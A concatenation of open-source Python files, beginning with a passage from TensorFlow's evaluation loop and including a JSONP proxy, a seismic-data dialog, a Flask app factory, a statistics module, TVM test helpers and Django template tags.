step = 0
eval_step = None
feed_dict = None
logging.info('Eval steps [%d,%s) for training step %d.', step,
'inf' if max_steps is None
else str(max_steps), current_global_step)
try:
try:
while (max_steps is None) or (step < max_steps):
step += 1
start_time = time.time()
feed_dict = feed_fn() if feed_fn is not None else None
if update_op is not None:
session.run(update_op, feed_dict=feed_dict)
else:
eval_results = session.run(eval_dict, feed_dict=feed_dict)
eval_step = step
# TODO(wicke): We should assert that the global step hasn't changed.
if step % log_every_steps == 0:
if eval_step is None or step != eval_step:
eval_results = session.run(eval_dict, feed_dict=feed_dict)
eval_step = step
duration = time.time() - start_time
logging.info('Results after %d steps (%.3f sec/batch): %s.',
step, float(duration),
_eval_results_to_str(eval_results))
finally:
if eval_results is None or step != eval_step:
eval_results = session.run(eval_dict, feed_dict=feed_dict)
eval_step = step
# Stop queue runners.
coord.request_stop()
coord.join(threads, stop_grace_period_secs=120)
# catch OutOfRangeError which is thrown when queue is out of data (and for
# other reasons as well).
except errors.OutOfRangeError as e:
if max_steps is None:
logging.info('Input queue is exhausted.')
else:
logging.warn('Input queue is exhausted: %s.', e)
# catch StopIteration which is thrown is DataReader is out of data.
except StopIteration as e:
if max_steps is None:
logging.info('Input iterator is exhausted.')
else:
logging.warn('Input iterator is exhausted: %s.', e)
# Save summaries for this evaluation.
_write_summary_results(output_dir, eval_results, current_global_step)
return eval_results, current_global_step
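# --- Hypothetical usage sketch (not part of the original module) -------------
# Schematic call pattern for `evaluate`: the caller supplies a graph that
# already contains the metric tensors listed in `eval_dict` plus a global step,
# and points at the checkpoint written by training. Paths and tensor names are
# illustrative only.
def _example_evaluate_usage(graph, accuracy_tensor, loss_tensor,
                            output_dir='/tmp/tf_learn_example/eval',
                            checkpoint_path='/tmp/tf_learn_example'):
  return evaluate(
      graph=graph,
      output_dir=output_dir,
      checkpoint_path=checkpoint_path,
      eval_dict={'accuracy': accuracy_tensor, 'loss': loss_tensor},
      max_steps=100,
      log_every_steps=20)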
def run_n(output_dict, feed_dict=None, restore_checkpoint_path=None, n=1):
"""Run `output_dict` tensors `n` times, with the same `feed_dict` each run.
Args:
output_dict: A `dict` mapping string names to tensors to run. Must all be
from the same graph.
feed_dict: `dict` of input values to feed each run.
restore_checkpoint_path: A string containing the path to a checkpoint to
restore.
n: Number of times to repeat.
Returns:
A list of `n` `dict` objects, each containing values read from `output_dict`
tensors.
"""
return run_feeds(
output_dict=output_dict,
feed_dicts=itertools.repeat(feed_dict, n),
restore_checkpoint_path=restore_checkpoint_path)
# TODO(ptucker): Add save_checkpoint_path.
def run_feeds(output_dict, feed_dicts, restore_checkpoint_path=None):
"""Run `output_dict` tensors with each input in `feed_dicts`.
If `restore_checkpoint_path` is supplied, restore from checkpoint. Otherwise,
init all variables.
Args:
output_dict: A `dict` mapping string names to `Tensor` objects to run.
Tensors must all be from the same graph.
feed_dicts: Iterable of `dict` objects of input values to feed.
restore_checkpoint_path: A string containing the path to a checkpoint to
restore.
Returns:
A list of dicts of values read from `output_dict` tensors, one item in the
list for each item in `feed_dicts`. Keys are the same as `output_dict`,
values are the results read from the corresponding `Tensor` in
`output_dict`.
Raises:
ValueError: if `output_dict` or `feed_dicts` is None or empty.
"""
if not output_dict:
raise ValueError('output_dict is invalid: %s.' % output_dict)
if not feed_dicts:
raise ValueError('feed_dicts is invalid: %s.' % feed_dicts)
graph = contrib_ops.get_graph_from_inputs(output_dict.values())
with graph.as_default() as g:
with tf_session.Session('') as session:
if restore_checkpoint_path:
_restore_from_checkpoint(session, g, restore_checkpoint_path)
else:
session.run(variables.initialize_all_variables())
session.run(variables.initialize_local_variables())
session.run(data_flow_ops.initialize_all_tables())
coord = coordinator.Coordinator()
threads = None
try:
threads = queue_runner.start_queue_runners(session, coord=coord)
return [session.run(output_dict, f) for f in feed_dicts]
finally:
coord.request_stop()
if threads:
coord.join(threads, stop_grace_period_secs=120)
def infer(restore_checkpoint_path, output_dict, feed_dict=None):
"""Restore graph from `restore_checkpoint_path` and run `output_dict` tensors.
If `restore_checkpoint_path` is supplied, restore from checkpoint. Otherwise,
init all variables.
Args:
restore_checkpoint_path: A string containing the path to a checkpoint to
restore.
output_dict: A `dict` mapping string names to `Tensor` objects to run.
Tensors must all be from the same graph.
feed_dict: `dict` object mapping `Tensor` objects to input values to feed.
Returns:
Dict of values read from `output_dict` tensors. Keys are the same as
`output_dict`, values are the results read from the corresponding `Tensor`
in `output_dict`.
Raises:
ValueError: if `output_dict` or `feed_dicts` is None or empty.
"""
return run_feeds(output_dict=output_dict,
feed_dicts=[feed_dict] if feed_dict is not None else [None],
restore_checkpoint_path=restore_checkpoint_path)[0]
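# --- Hypothetical usage sketch (not part of the original module) -------------
# Restores a checkpoint (placeholder path) and reads one batch of predictions.
# `probabilities_tensor` and `input_placeholder` must come from the graph the
# checkpoint was written for; the names here are illustrative only.
def _example_infer_usage(probabilities_tensor, input_placeholder, features):
  outputs = infer(
      restore_checkpoint_path='/tmp/tf_learn_example/model.ckpt-200',
      output_dict={'probabilities': probabilities_tensor},
      feed_dict={input_placeholder: features})
  return outputs['probabilities']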
| dhalleine/tensorflow | tensorflow/contrib/learn/python/learn/graph_actions.py | Python | apache-2.0 | 24,626 |
#!/usr/bin/python
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at: http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distrib-
# uted under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# specific language governing permissions and limitations under the License.
"""A proxy that validates JSON, localizes it, and returns JSON or JSONP."""
__author__ = 'kpy@google.com (Ka-Ping Yee)'
import httplib
import json
import logging
import pickle
import re
import urlparse
import base_handler
from google.appengine.api import memcache
from google.appengine.api import urlfetch
CACHE_SECONDS = 120 # seconds to cache each fetched URL
MAX_OUTBOUND_QPM_PER_IP = 30 # maximum outbound HTTP fetches/min per client IP
HTTP_TOO_MANY_REQUESTS = 429 # this HTTP status code is not defined in httplib
# Regular expression for a JSON string enclosed by a JavaScript function call.
# \w+ is broader than the official definition of a JavaScript identifier,
# but it's safe to be broad in what we match, since we're removing it.
JSON_CALLBACK_RE = re.compile(r'^\w+\((.*)\)[\s;]*$', re.UNICODE | re.DOTALL)
def SanitizeUrl(url):
"""Checks and returns a URL that is safe to fetch, or raises an error.
Args:
url: A URL.
Returns:
The URL, only if it is considered safe to fetch.
Raises:
base_handler.Error: The URL was missing or not safe to fetch.
"""
scheme, netloc, path, query, _ = urlparse.urlsplit(url)
if scheme in ['http', 'https'] and '.' in netloc:
return urlparse.urlunsplit((scheme, netloc, path, query, ''))
raise base_handler.Error(httplib.BAD_REQUEST, 'Missing or invalid URL.')
def ParseJson(json_string):
"""Parses a JSON or JSONP string and returns the parsed object."""
match = JSON_CALLBACK_RE.match(json_string)
if match:
json_string = match.group(1) # remove the function call around the JSON
try:
return json.loads(json_string)
except (TypeError, ValueError):
raise base_handler.Error(httplib.FORBIDDEN, 'Invalid JSON.')
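# Illustrative example (hypothetical payloads): a bare JSON object and a
# JSONP-wrapped one parse to the same dictionary.
#   ParseJson('{"a": 1}')                  -> {'a': 1}
#   ParseJson('callback_42({"a": 1});')    -> {'a': 1}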
def AssertRateLimitNotExceeded(client_ip):
"""Raises an error if the given IP exceeds its allowed request rate."""
cache_key = pickle.dumps(('jsonp.qpm', client_ip))
if memcache.get(cache_key) >= MAX_OUTBOUND_QPM_PER_IP:
raise base_handler.Error(HTTP_TOO_MANY_REQUESTS,
'Rate limit exceeded; please try again later.')
memcache.add(cache_key, 0, 60)
memcache.incr(cache_key)
def FetchJson(url, post_json, use_cache, client_ip, referrer=None):
"""Fetches a URL, parses it as JSON, and caches the resulting object.
Args:
url: A string, the URL to fetch.
post_json: An optional string. If specified, we do a POST instead of a
GET, and post this data with Content-Type: application/json.
use_cache: A boolean; if true, look in the cache, and if cached data is
present, return that instead of actually performing the fetch.
client_ip: A string, the IP address of the client. If the fetch rate per
client exceeds MAX_OUTBOUND_QPM_PER_IP requests per minute, we abort.
referrer: An optional string, the "Referer:" header to use in the request.
Returns:
A dictionary or list parsed from the fetched JSON.
Raises:
base_handler.Error: The request failed or exceeded the rate limit.
"""
url = SanitizeUrl(url)
cache_key = pickle.dumps(('jsonp.content', url, post_json))
value = None
if use_cache:
value = memcache.get(cache_key)
if value is None:
AssertRateLimitNotExceeded(client_ip)
method = post_json and 'POST' or 'GET'
headers = post_json and {'Content-Type': 'application/json'} or {}
if referrer:
headers['Referer'] = referrer
result = urlfetch.fetch(url, post_json, method, headers)
if result.status_code != httplib.OK:
logging.warn('Request for url=%r post_json=%r returned status %r: %r',
url, post_json, result.status_code, result.content)
raise base_handler.Error(result.status_code, 'Request failed.')
value = ParseJson(result.content)
memcache.set(cache_key, value, CACHE_SECONDS)
return value
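# Illustrative call (hypothetical URL and client address): fetch a JSON feed with
# a GET request, serving repeated requests from memcache for up to CACHE_SECONDS.
#   data = FetchJson('https://example.com/feed.json', None, True, '203.0.113.7')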
def PopLocalizedChild(parent, field_name, lang):
"""Finds and removes a localized child object in a MapRoot data structure.
Both MapRoot and Layer structures have a field ("localized_map_roots" or
"localized_layers") that contains an array of localized versions of the
MapRoot or Layer object. Each element of the array is a dictionary with a
"language" key and a "map_root" key, or a "language" key and a "layer" key.
This function finds the localized MapRoot or Layer object for a given
language, returns it, and removes the array of all the localizations from
the parent object.
Args:
parent: A MapRoot or Layer structure, as a Python dictionary.
field_name: A string, either "map_root" or "layer".
lang: The language code to look for in the "language" field.
Returns:
The child MapRoot or Layer object containing localized fields.
"""
for localization in parent.pop('localized_%ss' % field_name, ()):
if localization.get('language') == lang:
return localization.get(field_name, {})
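# Illustrative data (hypothetical values) for PopLocalizedChild:
#   layer = {'title': 'Roads',
#            'localized_layers': [{'language': 'fr', 'layer': {'title': 'Routes'}}]}
#   PopLocalizedChild(layer, 'layer', 'fr')  # -> {'title': 'Routes'}
# After the call, 'localized_layers' has been removed from the parent dict.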
def LocalizeLayer(layer, lang):
"""Localizes a Layer object in place and discards unused localizations.
Args:
layer: A Layer structure as a dictionary, to be modified in place.
lang: A string, the language code for the language to localize to.
"""
layer.update(PopLocalizedChild(layer, 'layer', lang) or {})
for sublayer in layer.get('sublayers', ()):
LocalizeLayer(sublayer, lang)
def LocalizeMapRoot(map_root, lang):
"""Localizes a MapRoot object in place and discards unused localizations.
Args:
map_root: A MapRoot structure as a dictionary, to be modified in place.
lang: A string, the language code for the language to localize to.
"""
map_root.update(PopLocalizedChild(map_root, 'map_root', lang) or {})
for layer in map_root.get('layers', ()):
LocalizeLayer(layer, lang)
class Jsonp(base_handler.BaseHandler):
"""A proxy that validates JSON, localizes it, and returns JSON or JSONP.
Accepts these query parameters:
- url: Required. A URL from which to fetch JSON. The URL must provide
syntactically valid JSON, or valid JSON wrapped in a function call.
- post_json: Optional. If non-empty, we do a POST instead of a GET and
send this data with Content-Type: application/json.
- no_cache: Optional. If specified, we fetch the JSON directly from the
source URL instead of consulting the cache (up to CACHE_SECONDS old).
- callback: Optional. A callback function name. If provided, the
returned JSON is wrapped in a JavaScript function call.
- hl: Optional. A BCP 47 language code. If specified, the JSON is
treated as MapRoot and localized to the specified language, and the
localizations for other languages are discarded.
"""
# This class needs no __init__ method. # pylint: disable=no-init
def Get(self):
url = self.request.get('url', '')
post_json = self.request.get('post_json', '')
use_cache = not self.request.get('no_cache')
hl = self.request.get('hl', '')
data = FetchJson(url, post_json, use_cache, self.request.remote_addr,
self.request.headers.get('Referer'))
if hl:
LocalizeMapRoot(data, hl)
self.WriteJson(data)
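# Illustrative request (hypothetical endpoint and source URL):
#   GET /jsonp?url=https://example.com/map.json&hl=fr&callback=render
# fetches the JSON, localizes it to French and, per the class docstring, returns
# it wrapped in a render(...) call.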
| AppScale/crisismap | jsonp.py | Python | apache-2.0 | 7,687 |
# encoding: utf-8
'''
@author: Jose Emilio Romero Lopez
@copyright: Copyright 2013-2014, Jose Emilio Romero Lopez.
@license: GPL
@contact: jemromerol@gmail.com
This file is part of APASVO.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from PySide import QtGui
from apasvo.gui.views.generated import ui_loaddialog
from apasvo.utils.formats import rawfile
FORMATS = {'Autodetect': None,
'Binary': rawfile.format_binary,
'Text': rawfile.format_text,
}
DEFAULT_FORMAT = 'Autodetect'
DTYPES = (rawfile.datatype_int16,
rawfile.datatype_int32,
rawfile.datatype_int64,
rawfile.datatype_float16,
rawfile.datatype_float32,
rawfile.datatype_float64, )
DTYPES_LABELS = ('16 bits, PCM',
'32 bits, PCM',
'64 bits, PCM',
'16 bits, float',
'32 bits, float',
'64 bits, float', )
BYTEORDERS = (rawfile.byteorder_little_endian,
rawfile.byteorder_big_endian)
class LoadDialog(QtGui.QDialog, ui_loaddialog.Ui_LoadDialog):
"""A dialog window to load seismic data stored in a binary or text file.
Allows the user to choose several settings in order to load a seismic
signal, i.e.:
Format: Binary or text format.
Data-type: Float16, Float32 or Float64,
Endianness: Little-endian or big-endian.
Sample rate.
The class also infers the right parameters for the chosen file and shows
a preview of the loaded data for the selected parameters.
Attributes:
filename: Name of the opened file.
"""
def __init__(self, parent, filename):
super(LoadDialog, self).__init__(parent)
self.setupUi(self)
self.FileFormatComboBox.currentIndexChanged.connect(self.on_format_change)
self.FileFormatComboBox.currentIndexChanged.connect(self.load_preview)
self.DataTypeComboBox.currentIndexChanged.connect(self.load_preview)
self.ByteOrderComboBox.currentIndexChanged.connect(self.load_preview)
# init file format combobox
self.FileFormatComboBox.addItems(FORMATS.keys())
self.FileFormatComboBox.setCurrentIndex(FORMATS.keys().index(DEFAULT_FORMAT))
# init datatype combobox
self.DataTypeComboBox.addItems(DTYPES_LABELS)
self.DataTypeComboBox.setCurrentIndex(DTYPES.index(rawfile.datatype_float64))
self.filename = filename
self.load_preview()
def on_format_change(self, idx):
"""Updates UI after toggling the format value."""
fmt = FORMATS[self.FileFormatComboBox.currentText()]
if fmt == rawfile.format_binary:
self.DataTypeComboBox.setVisible(True)
self.DataTypeLabel.setVisible(True)
self.ByteOrderComboBox.setVisible(True)
self.ByteOrderLabel.setVisible(True)
self.groupBox_2.setVisible(True)
self.SampleFrequencySpinBox.setVisible(True)
self.SampleFrequencyLabel.setVisible(True)
elif fmt == rawfile.format_text:
self.DataTypeComboBox.setVisible(False)
self.DataTypeLabel.setVisible(False)
self.ByteOrderComboBox.setVisible(False)
self.ByteOrderLabel.setVisible(False)
self.groupBox_2.setVisible(True)
self.SampleFrequencySpinBox.setVisible(True)
self.SampleFrequencyLabel.setVisible(True)
else:
self.DataTypeComboBox.setVisible(False)
self.DataTypeLabel.setVisible(False)
self.ByteOrderComboBox.setVisible(False)
self.ByteOrderLabel.setVisible(False)
self.groupBox_2.setVisible(False)
self.SampleFrequencySpinBox.setVisible(False)
self.SampleFrequencyLabel.setVisible(False)
self.groupBox.adjustSize()
self.adjustSize()
def load_preview(self):
"""Shows a preview of loaded data using the selected parameters."""
# Load parameters
values = self.get_values()
try:
# Set up a file handler according to the type of raw data (binary or text)
fhandler = rawfile.get_file_handler(self.filename, **values)
# Print data preview
array = fhandler.read_in_blocks().next()
data = ''
for x in array:
data += ("%g\n" % x)
except:
data = '*** There was a problem reading the file content ***'
self.buttonBox.button(QtGui.QDialogButtonBox.Ok).setEnabled(False)
else:
self.buttonBox.button(QtGui.QDialogButtonBox.Ok).setEnabled(True)
self.PreviewTextEdit.clear()
self.PreviewTextEdit.setText(data)
def get_values(self):
"""Gets selected parameters."""
return {'fmt': FORMATS[self.FileFormatComboBox.currentText()],
'dtype': DTYPES[self.DataTypeComboBox.currentIndex()],
'byteorder': BYTEORDERS[self.ByteOrderComboBox.currentIndex()],
'fs': float(self.SampleFrequencySpinBox.value())}
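# Illustrative usage (hypothetical file name), e.g. from a parent window:
#   dialog = LoadDialog(parent, '/tmp/signal.bin')
#   if dialog.exec_() == QtGui.QDialog.Accepted:
#       params = dialog.get_values()  # {'fmt': ..., 'dtype': ..., 'byteorder': ..., 'fs': ...}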
| jemromerol/apasvo | apasvo/gui/views/loaddialog.py | Python | gpl-3.0 | 5,689 |
# Copyright 2011 Sebastien Maccagnoni-Munch
#
# This file is part of Omoma.
#
# Omoma is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3.
#
# Omoma is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Omoma. If not, see <http://www.gnu.org/licenses/>.
"""
Django template tags for Omoma
"""
| TheGU/omoma | omoma/omoma_web/templatetags/__init__.py | Python | gpl-3.0 | 666 |
# Lint as: python3
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Base configurations to standardize experiments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import REDACTED
from __future__ import print_function
import copy
from typing import Any, List, Mapping, Optional
import REDACTED
import dataclasses
import tensorflow as tf
import yaml
from REDACTED.tf2_common.modeling.hyperparams import params_dict
@dataclasses.dataclass
class Config(params_dict.ParamsDict):
"""The base configuration class that supports YAML/JSON based overrides."""
default_params: dataclasses.InitVar[Mapping[str, Any]] = None
restrictions: dataclasses.InitVar[List[str]] = None
def __post_init__(self, default_params, restrictions, *args, **kwargs):
super().__init__(default_params=default_params,
restrictions=restrictions,
*args,
**kwargs)
def _set(self, k, v):
if isinstance(v, dict):
if k not in self.__dict__:
self.__dict__[k] = params_dict.ParamsDict(v, [])
else:
self.__dict__[k].override(v)
else:
self.__dict__[k] = copy.deepcopy(v)
def __setattr__(self, k, v):
if k in params_dict.ParamsDict.RESERVED_ATTR:
# Set the essential private ParamsDict attributes.
self.__dict__[k] = copy.deepcopy(v)
else:
self._set(k, v)
def replace(self, **kwargs):
"""Like `override`, but returns a copy with the current config unchanged."""
params = self.__class__(self)
params.override(kwargs, is_strict=True)
return params
@classmethod
def from_yaml(cls, file_path: str):
# Note: This only works if the Config has all default values.
with tf.io.gfile.GFile(file_path, 'r') as f:
loaded = yaml.load(f)
config = cls()
config.override(loaded)
return config
@classmethod
def from_json(cls, file_path: str):
"""Wrapper for `from_yaml`."""
return cls.from_yaml(file_path)
@classmethod
def from_args(cls, *args, **kwargs):
"""Builds a config from the given list of arguments."""
attributes = list(cls.__annotations__.keys())
default_params = {a: p for a, p in zip(attributes, args)}
default_params.update(kwargs)
return cls(default_params)
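# Illustrative sketch (hypothetical fields): deriving an experiment config and
# producing a modified copy via `replace`.
#
#   @dataclasses.dataclass
#   class TrainerConfig(Config):
#     learning_rate: float = 0.1
#     batch_size: int = 64
#
#   cfg = TrainerConfig()
#   cfg = cfg.replace(learning_rate=0.01)  # copy with a single override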
| mlperf/training_results_v0.7 | Google/benchmarks/bert/implementations/bert-cloud-TF2.0-tpu-v3-32/tf2_common/modeling/hyperparams/base_config.py | Python | apache-2.0 | 2,947 |
from flask import Flask, render_template
from flask.ext.bootstrap import Bootstrap
from flask.ext.moment import Moment
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.login import LoginManager
from flask.ext.uploads import UploadSet, configure_uploads, IMAGES
from config import config
bootstrap = Bootstrap()
moment = Moment()
db = SQLAlchemy()
login_manager = LoginManager()
login_manager.session_protection = 'strong'
login_manager.login_view = 'auth.login'
avatars = UploadSet('avatars', IMAGES)
def create_app(config_name):
app = Flask(__name__)
app.config.from_object(config[config_name])
config[config_name].init_app(app)
bootstrap.init_app(app)
moment.init_app(app)
db.init_app(app)
login_manager.init_app(app)
    configure_uploads(app, (avatars,))
from .main import main as main_blueprint
from .auth import auth as auth_blueprint
from .admin import admin as admin_blueprint
app.register_blueprint(main_blueprint)
app.register_blueprint(auth_blueprint, url_prefix='/auth')
app.register_blueprint(admin_blueprint, url_prefix='/admin')
return app
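# Illustrative usage (the configuration name is hypothetical; it must be a key
# of the `config` dict imported from config.py):
#   app = create_app('development')
#   app.run(debug=True)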
| chenke91/ihaveablog | app/__init__.py | Python | mit | 1,126 |
__author__ = "Jerome Kieffer"
__license__ = "MIT"
__copyright__ = "2017, ESRF"
import numpy
from math import log
from .collections import GOF
from ._cormap import measure_longest
class LongestRunOfHeads(object):
"""Implements the "longest run of heads" by Mark F. Schilling
The College Mathematics Journal, Vol. 21, No. 3, (1990), pp. 196-207
See: http://www.maa.org/sites/default/files/pdf/upload_library/22/Polya/07468342.di020742.02p0021g.pdf
"""
def __init__(self):
"We store already calculated values for (n,c)"
self.knowledge = {}
def A(self, n, c):
"""Calculate A(number_of_toss, length_of_longest_run)
:param n: number of coin toss in the experiment, an integer
        :param c: length of the longest run of heads
:return: The A parameter used in the formula
"""
if n <= c:
return 2 ** n
elif (n, c) in self.knowledge:
return self.knowledge[(n, c)]
else:
s = 0
for j in range(c, -1, -1):
s += self.A(n - 1 - j, c)
self.knowledge[(n, c)] = s
return s
def B(self, n, c):
"""Calculate B(number_of_toss, length_of_longest_run)
to have either a run of Heads either a run of Tails
:param n: number of coin toss in the experiment, an integer
:param c: length of the longest run of
:return: The B parameter used in the formula
"""
return 2 * self.A(n - 1, c - 1)
def __call__(self, n, c):
"""Calculate the probability for the longest run of heads to exceed the observed length
:param n: number of coin toss in the experiment, an integer
:param c: length of the longest run of heads, an integer
        :return: The probability of having c subsequent heads in n tosses of a fair coin
"""
if c >= n:
return 0
delta = 2 ** n - self.A(n, c)
if delta <= 0:
return 0
return 2.0 ** (log(delta, 2) - n)
def probaHeadOrTail(self, n, c):
"""Calculate the probability of a longest run of head or tails to occur
:param n: number of coin toss in the experiment, an integer
:param c: length of the longest run of heads or tails, an integer
        :return: The probability of having c subsequent heads or tails in n tosses of a fair coin
"""
if c > n:
return 0
if c == 0:
return 0
delta = self.B(n, c) - self.B(n, c - 1)
if delta <= 0:
return 0
return min(2.0 ** (log(delta, 2.0) - n), 1.0)
def probaLongerRun(self, n, c):
"""Calculate the probability for the longest run of heads or tails to exceed the observed length
:param n: number of coin toss in the experiment, an integer
        :param c: length of the observed run of heads or tails, an integer
        :return: The probability of having more than c subsequent heads or tails in n tosses of a fair coin
"""
if c > n:
return 0
if c == 0:
return 0
delta = (2 ** n) - self.B(n, c)
if delta <= 0:
return 0
return min(2.0 ** (log(delta, 2.0) - n), 1.0)
LROH = LongestRunOfHeads()
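# Illustrative example: probability that a sequence of 100 fair-coin tosses
# contains a run of more than 8 identical outcomes (heads or tails).
#   p = LROH.probaLongerRun(100, 8)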
def gof(data1, data2):
"""Calculate the probability for a couple of dataset to be equivalent
Implementation according to:
http://www.nature.com/nmeth/journal/v12/n5/full/nmeth.3358.html
:param data1: numpy array
:param data2: numpy array
:return: probablility for the 2 data to be equivalent
"""
if data1.ndim == 2 and data1.shape[1] > 1:
data1 = data1[:, 1]
if data2.ndim == 2 and data2.shape[1] > 1:
data2 = data2[:, 1]
cdata = numpy.ascontiguousarray(data2 - data1, numpy.float64).ravel()
c = measure_longest(cdata)
n = cdata.size
res = GOF(n, c, LROH.probaLongerRun(n, c - 1))
return res
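# Illustrative sketch (synthetic data): comparing two noisy copies of a signal.
#   import numpy
#   a = numpy.random.normal(size=512)
#   b = a + numpy.random.normal(scale=0.1, size=512)
#   result = gof(a, b)  # carries the sample size, longest run, and its probability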
| kif/freesas | freesas/cormap.py | Python | mit | 4,026 |
import os
from PIL import Image
import numpy as np
from tvm.contrib.download import download_testdata
def get_mobilenet():
url = 'https://docs-assets.developer.apple.com/coreml/models/MobileNet.mlmodel'
dst = 'mobilenet.mlmodel'
real_dst = download_testdata(url, dst, module='coreml')
return os.path.abspath(real_dst)
def get_resnet50():
url = 'https://docs-assets.developer.apple.com/coreml/models/Resnet50.mlmodel'
dst = 'resnet50.mlmodel'
real_dst = download_testdata(url, dst, module='coreml')
return os.path.abspath(real_dst)
def get_cat_image():
url = 'https://gist.githubusercontent.com/zhreshold/bcda4716699ac97ea44f791c24310193/raw/fa7ef0e9c9a5daea686d6473a62aacd1a5885849/cat.png'
dst = 'cat.png'
real_dst = download_testdata(url, dst, module='data')
img = Image.open(real_dst).resize((224, 224))
# CoreML's standard model image format is BGR
img_bgr = np.array(img)[:, :, ::-1]
img = np.transpose(img_bgr, (2, 0, 1))[np.newaxis, :]
    return np.asarray(img)
| Huyuwei/tvm | tests/python/frontend/coreml/model_zoo/__init__.py | Python | apache-2.0 | 1,032 |
import random
from hashlib import sha256
from urllib.parse import urlencode, urlparse
from django import template
from django.conf import settings
from django.http import HttpRequest
from django.utils.http import urlquote
from django.utils.safestring import SafeData, mark_safe
from core.utils import sanitize_next
register = template.Library()
@register.simple_tag
def random_identifier(length=None):
try:
length = int(length)
except Exception:
length = None
if length is None or length <= 0:
length = random.randint(16, 48)
return ''.join(random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz123456789_')
for n in range(length))
@register.filter(is_safe=True)
def public_id(account):
try:
return sha256(str(account.pk).encode() + str(account.date_joined).encode()).hexdigest()
except Exception:
return ''
register.simple_tag(func=lambda *args: list(args), name='list')
register.simple_tag(func=lambda **kwargs: dict(kwargs), name='dict')
@register.filter(is_safe=True)
def are_any(iterable):
try:
return any(iterable)
except (ValueError, TypeError):
return bool(iterable)
@register.filter(is_safe=True)
def are_all(iterable):
try:
return all(iterable)
except (ValueError, TypeError):
return bool(iterable)
@register.filter(is_safe=False)
def split(value, by=None):
"""
A template filter to split objects (commonly, strings) by the given argument. A missing argument will split the
object by any whitespace; if the object cannot be split, it will be wrapped in a list. Strings marked as "safe"
by Django will still have their parts correctly marked in the resulting list.
If the argument is of the form 'separator~number', the resulting chunks will have a maximum length of `number`;
this means that to use a tilde as separator, it must be doubled: '~~'. The chunking will also un-mark the parts
as "safe" because it might cut HTML tags into several (not-safe-anymore) pieces; Use only for plain text.
"""
try:
length = None
if by == 'NEWLINE':
by = '\n'
if by and isinstance(by, str) and '~' in by:
by, length = by.rsplit('~', maxsplit=1)
try:
length = abs(int(length))
except ValueError:
length = None
parts = value.split(by)
except (ValueError, TypeError, AttributeError):
parts = [value]
if isinstance(value, SafeData):
parts = [mark_safe(part) for part in parts]
if length:
parts = [[part[i:i+length] for i in range(0, len(part), length)] if part else [part] for part in parts]
return [chunk for part_chunks in parts for chunk in part_chunks]
else:
return parts
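# Illustrative template usage (context variable names are hypothetical):
#   {{ "alpha beta gamma"|split }}   -> ['alpha', 'beta', 'gamma']
#   {{ csv_line|split:",~8" }}       -> comma-separated parts, re-chunked to at most 8 chars each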
@register.filter(is_safe=False)
def mult(value, by):
try:
return value * int(by)
except (ValueError, TypeError):
return ''
@register.filter(is_safe=True)
@template.defaultfilters.stringfilter
def compact(value):
"""
A template filter that removes all extra whitespace from the value it is applied to, and strips any whitespace
    at the beginning and at the end of the resulting string. Any characters that can act as whitespace (including
    newlines) are replaced by a space and collapsed.
"""
return ' '.join(value.split())
@register.simple_tag(name='next', takes_context=True)
def next_link(
context,
proceed_to, proceed_to_anchor=None, proceed_to_anchor_id=None,
url_only=False, default=''):
"""
A template tag used to provide the properly encoded redirection target parameter for URLs. The target can be
specified directly, or via the tokens 'this page' (meaning, the current page's URL will be used) or 'next page'
(meaning, the value from current page's redirection parameter will be used). In the latter case, the target
value is verified prior to use; an unsafe value is ignored. The additional parameters:
- url_only: causes the tag to output only the calculated target's URL, without encoding for a Query String.
- default: provides a default value to output in case the indicated redirection target is empty or unsafe.
"""
if str(proceed_to).startswith('#'):
proceed_to_anchor_id, proceed_to_anchor, proceed_to = proceed_to_anchor, proceed_to, 'this page'
if isinstance(context, HttpRequest):
context = {'request': context}
url_param = ''
if proceed_to == "this page":
if 'request' in context:
url_param = context['request'].get_full_path()
elif proceed_to == "next page":
if 'request' in context:
url_param = sanitize_next(context['request'])
else:
url_param = proceed_to
url_param_value = ''.join([
str(url_param),
str(proceed_to_anchor) if proceed_to_anchor else '',
str(proceed_to_anchor_id) if proceed_to_anchor and proceed_to_anchor_id else '',
]) if url_param else default
if not url_only and url_param_value:
return urlencode(
{settings.REDIRECT_FIELD_NAME: url_param_value},
quote_via=lambda v, *args: urlquote(v, safe='')
)
else:
return url_param_value or ''
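# Illustrative template usage (URL name is hypothetical; assumes the common
# REDIRECT_FIELD_NAME of 'next' and that this tag library has been loaded):
#   <a href="{% url 'login' %}?{% next 'this page' %}">Log in</a>
# renders something like ?next=%2Fcurrent%2Fpage%2F for the page being viewed.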
@register.simple_tag(name='previous', takes_context=True)
def previous_link(context, default=''):
"""
A template tag used to provide the properly verified redirection target for going back to the previously
visited page.
- default: provides a default value to output in case the redirection target is empty or unsafe.
"""
url_param_value = ''
if 'request' in context:
referrer_url = context['request'].META.get('HTTP_REFERER', '')
url_param_value = sanitize_next(context['request'], url=referrer_url)
return urlparse(url_param_value).path or default
| tejoesperanto/pasportaservo | core/templatetags/utils.py | Python | agpl-3.0 | 5,909 |
